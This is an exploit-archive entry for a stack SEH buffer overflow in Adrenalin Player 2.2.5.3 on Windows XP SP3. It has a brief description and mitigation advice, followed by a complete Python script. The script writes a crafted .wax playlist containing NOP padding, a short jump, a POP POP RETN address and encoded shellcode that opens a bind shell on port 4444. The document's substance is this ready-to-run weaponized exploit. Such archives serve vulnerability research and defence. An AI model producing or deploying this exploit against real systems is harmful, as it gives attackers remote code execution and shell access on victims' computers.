Adrenalin Player (SEH) Buffer Overflow

vendor:

Adrenalin Player

by:

onying

N/A

CVSS

HIGH

Buffer Overflow

119

CWE

Product Name: Adrenalin Player

Affected Version From: 2.2.5.3

Affected Version To: 2.2.5.3

Patch Exists: NO

Related CWE: Unknown

CPE: cpe:2.3:a:adrenalin_player:adrenalin_player:2.2.5.3:*:*:*:*:*:*:*

Metasploit:

Other Scripts:

Platforms Tested: Windows XP SP3

2013

Adrenalin Player (SEH) Buffer Overflow

This exploit takes advantage of a buffer overflow vulnerability in Adrenalin Player. By sending a specially crafted payload, an attacker can overwrite the Structured Exception Handler (SEH) to execute arbitrary code. The exploit uses a combination of NOP padding, a short jump, and a POP POP RETN sequence to achieve code execution. Additionally, it includes a shellcode payload to create a bind shell on port 4444. The exploit has been tested on Windows XP SP3.

Mitigation:

To mitigate this vulnerability, users should update to a patched version of Adrenalin Player or switch to a different media player. Additionally, users should exercise caution when opening media files from untrusted sources.

Source

Exploit-DB raw data:

# !/usr/bin/python
# Title:                Adrenalin Player (SEH) Buffer Overflow 
# software: 		Adrenalin Player
# version : 		2.2.5.3
# Platform:             Windows XP sp3
# Date:                 June 16th, 2013
# Author:               onying (@onyiing)
# Blog :		http://itsecuritynewbie.blogspot.com/
# Thanks to:            Information Security Shinobi Camp | http://www.is2c-dojo.com


junk= "\x90" * 2140
junk+="\xeb\x06\x90\x90" #jmp short
junk+="\x13\xf3\x16\x10" #POP POP RETN
junk+="\x90" * 16 # NOP padding before shellcode

#win32_bind - EXITFUNC=process LPORT=4444 Size=344 Encoder=ShikataGaNa
junk+=("\xbb\x25\xaa\xd2\xa3\x2b\xc9\xda\xd6\xd9\x74\x24\xf4\x5e\xb1\x51"
"\x31\x5e\x10\x83\xee\xfc\x03\x7b\xa6\x30\x56\x7f\xdc\x5f\xd4\x97"
"\xd8\x5f\x18\x98\x7b\x2b\x8b\x42\x58\xa0\x11\xb6\x2b\xca\x9c\xbe"
"\x2a\xdc\x14\x71\x35\xa9\x74\xad\x44\x46\xc3\x26\x72\x13\xd5\xd6"
"\x4a\xe3\x4f\x8a\x29\x23\x1b\xd5\xf0\x6e\xe9\xd8\x30\x85\x06\xe1"
"\xe0\x7e\xcf\x60\xec\xf4\x50\xae\xef\xe1\x09\x25\xe3\xbe\x5e\x66"
"\xe0\x41\x8a\x9b\x34\xc9\xc5\xf7\x60\xd1\xb4\xc4\x58\x32\x52\x41"
"\xd9\xf4\x10\x15\xd2\x7f\x56\x89\x47\xf4\xd7\xb9\xc9\x63\x56\xf7"
"\xfb\x9f\x36\xf8\xd2\x06\xe4\x60\xb3\xf5\x38\x04\x34\x89\x0e\x8b"
"\xee\x92\xbf\x5b\xc4\x80\xbc\xa0\x8a\xa5\xeb\x89\xa3\xbf\x72\xb4"
"\x59\x37\x79\xe3\xcb\x4a\x82\xdb\x64\x92\x75\x2e\xd9\x73\x79\x06"
"\x71\x2f\xd6\xf5\x25\x8c\x8b\xba\x9a\xed\xfc\x5a\x75\x03\xa1\xc4"
"\xd6\xaa\xb8\x9d\xb1\x08\x20\xed\x86\x06\xaa\xdb\x63\xb9\x05\xb6"
"\x8c\x69\xcd\x9c\xde\xa4\xe7\x8b\xdf\x6f\xa4\x66\xdf\x40\x23\x6d"
"\x56\xe7\xfd\x3a\x96\x31\xad\x90\x3c\xeb\xb1\xc8\x2e\x7b\xa9\x91"
"\x96\x05\x62\x9e\xc1\xa3\x73\xb0\x88\x21\xe8\x56\x3d\xd5\x9d\x1f"
"\x58\x73\x0e\x46\x8a\x48\x27\x9f\xa6\x14\xb1\xbd\x06\x55\x32\xeb"
"\x97\x17\x98\x15\x25\xb4\x71\x64\xd0\xfc\xde\xdd\x8e\x95\x52\xdf"
"\x62\x73\x6c\x6a\xc1\x83\x44\xcf\x9e\x29\x38\xbe\x71\xa4\xbb\x11"
"\x23\x6d\xed\x6e\x13\xe5\xa0\x49\x91\x38\xe9\x96\x4c\xae\xf1\x97"
"\x46\xd0\xde\xec\xfe\xd2\x5c\x36\x64\xd4\xb5\xe4\x9a\xfa\x52\x76"
"\xbd\x19\xd1\xd5\xc2\x08\xe9\x09")
junk+= "\x90" * (3000-len(junk))
file = open("adrenalin.wax","w")
file.write(junk)
file.close()